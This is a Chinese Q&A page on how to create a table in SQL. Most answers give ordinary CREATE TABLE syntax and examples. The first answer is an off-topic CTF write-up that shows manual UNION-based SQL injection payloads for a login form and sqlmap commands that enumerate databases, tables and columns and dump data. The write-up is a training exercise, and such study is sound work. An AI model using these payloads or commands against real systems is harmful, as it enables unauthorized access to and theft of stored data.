如何用SQL创建一个表格?

发布网友 发布时间：2022-04-23 16:02

我来回答

共8个回答

懂视网 时间：2022-05-01 18:27

1，我们打开题目，可以看到一个登陆页面，这是我们在输入框里面输入万能密码:  ‘ and ‘1‘=‘      ,然后我们在密码框输入   ‘ and ‘1‘=‘1‘ union select 1,group_concat(schema_name),3 from information_schema.schemata#   ，

这里上面的输入框是and,是为了让上面的报错，下面的输入框是and，是为了union后面的语句成功执行。这里我们是先爆出来数据库，可以看到如图所示的源码（这里看源码的时候千万不要点确认，要用Ctrl+u来看）。

2,这时我们爆出了数据库，下面我们爆表，我们在上面的输入框输入   ‘ and ‘1‘=‘1   ,在下面输入‘ and ‘1‘=‘1‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# ,"database()表示当前的数据库"

3,爆出来了表，看到flag，是不是很激动，嘿嘿，接下来我们爆字段，

上面的输入框输入‘ and ‘1‘=‘1    ,下面的输入框输入‘ and ‘1‘=‘1‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x666C6167#   ，这里的  0x666C6167  是flag的十六进制编码，因为在数据库里面，数据库和表和字段都是以十六进制储存的。

4，上面的输入框输入‘ and ‘1‘=‘1   ,下面的输入框输入 ‘ and ‘1‘=‘1‘ union select 1,group_concat(id,0x7e,flag),3 from flag# ，这里我们就可以看到flag了。

5，现在是不是感觉很简单啊，至此我的工作完成，你们的工作还得继续。任重而道远！

 

 

二、工具（sqlmap）

1,打开登录页面，在输入框里面里面随便输入数字，然后抓包(这里用burp suite抓包，没有这个工具的可以找我)得到数据，如下面的图所示。

2,把图中的数据复制下来，在sqlmap目录下面新建一个1.txt,文件，把复制的数据放1.txt文件里面，

然后打开sqlmap,输入sqlmap.py -r 1.txt --dbs   ,如下图所示

3，得到下面数据。

4，得到库，接下来输入 sqlmap.py -r 1.txt -D web --tables   ,这里也可以输入sqlmap.py -r 1.txt --tables -D web，结果都是一样的，

----爆表----。

5，得到表，下面爆字段，输入sqlmap.py -r 1.txt -D web -table flag --columns或者sqlmap.py -r 1.txt --columns -table flag -D web

 

6，下面就爆内容了，输入sqlmap.py -r 1.txt -D web -T flag -C flag --dump  或者输入sqlmap.py -r 1.txt  --dump -D web -T flag -C flag    结果如图所示

7，在你们joker学长的帮助下（到用的他的图），终于完成了。（注：上面那些表，可以不用双引号的）。

 

SQL1

标签：src   blog   登录   ima   font   alt   16px   表示   sel   

热心网友 时间：2022-05-01 15:35

1、打开SQL Server，在数据库处，右键数据库，点击新建数据库。

2、然后，命名为LX，点击确定，创建数据库，如图所示。

3、创建完，没有看到新建数据库的，在数据库那右键，刷新。如图所示就出来了。

4、接着，找到LX数据库下的表，右键，新建表，如图所示。

5、比如建立一个简单的部门表，简单部门表包含（部门编号、部门名），SQL Server
是可以用中文做列名的，但是为了能够被他人看懂，我们一般用英文，如图所示，

DepertNo，DepertName，我喜欢在列名前加一个fld_，个人养成的一种习惯，看自己的习惯吧。因为我们有时候转换成英文，可能会与SQL的某些关键字起冲突，因此我加了个fld_。此外讲一下varchar为类型，10为长度，2个长度为1个汉字。

6、表设置主键，每个表只能有一个主键，右键表的最左侧，点击设置主键，最右边为空自动去勾，主键是不能为空的。一般部门号不会为空，部门名也是不会为空，所以也去掉勾，不允许为null。

7、输入好列后，右键标题，然后点击保存Table_1，如图所示，表名前我习惯加TBL_。

8、如图所示，为SQL语句创建表。

热心网友 时间：2022-05-01 16:53

创建表

这个create table语句是用于创建一个新的表格。以下是一个简单创建表格语句的格式：

create table "tablename"

("column1" "data type",

"column2" "data type",

"column3" "data type";

如果你想使用可选的约束，创建表格的格式为：

create table "tablename"

("column1" "data type" [constraint],

"column2" "data type" [constraint],

"column3" "data type" [constraint]);

[ ] = optional

这里注意：你可以任意创建多列的表格，这个条件是可选的。

热心网友 时间：2022-05-01 18:27

create table 表名
{ 列名 类型（大小），
列名 类型（大小），
...
}

热心网友 时间：2022-05-01 20:19

CREATE TABLE [table] (
[table_id] [int] IDENTITY (1, 1) NOT NULL ,
[table_language] [int] NULL ,
[table_name] [varchar] (256) COLLATE Chinese_PRC_CI_AS NULL
) ON [PRIMARY]

热心网友 时间：2022-05-01 22:27

create table t_aaa (id int primary key,name varchar(20),sex tinyint)

热心网友 时间：2022-05-02 00:51

一般格式为：
CREATE TABLE <表名>(
<列名><数据类型>[列级完整性约束定义]
{，<列名><数据类型>[列级完整性约束定义]…}
[,表级完整性约束定义])
解释：
1、[ ] ---方括号中的内容表示是可选的，如： [列级完整性约束定义] 代表可以有也可以没有
2、完整性约束定义含以下几种：
只*列的约束定义：NOT NULL (意：*列取值非空)，DEFAULT(意：指定列的默认值)、
既可*列也可*表的约束定义：UNIQUE（意：*取值唯一，不能重复）CHECK（意：*列的取值范围）、PRIMARY KEY （意：定义主键约束，主键：唯一确定一个元组的属性）
以创建一张表维护学生信息为例：

CREATE TABLE STUDENT(
ID CHAR (7) PRIMARY KEY , -------设置ID为主键
NAME NCHAR(5) NOT NULL, --------*姓名不能为空
SEX NCHAR(1), --------性别占最多1个字符
AGE TINYINT, ------- 年龄在0-255之间整数、
DEPT NVARCHAR(20)
)
学习来源：《数据库原理与实践教程》——SQL server

热心网友 时间：2022-05-02 03:33

新建表格涩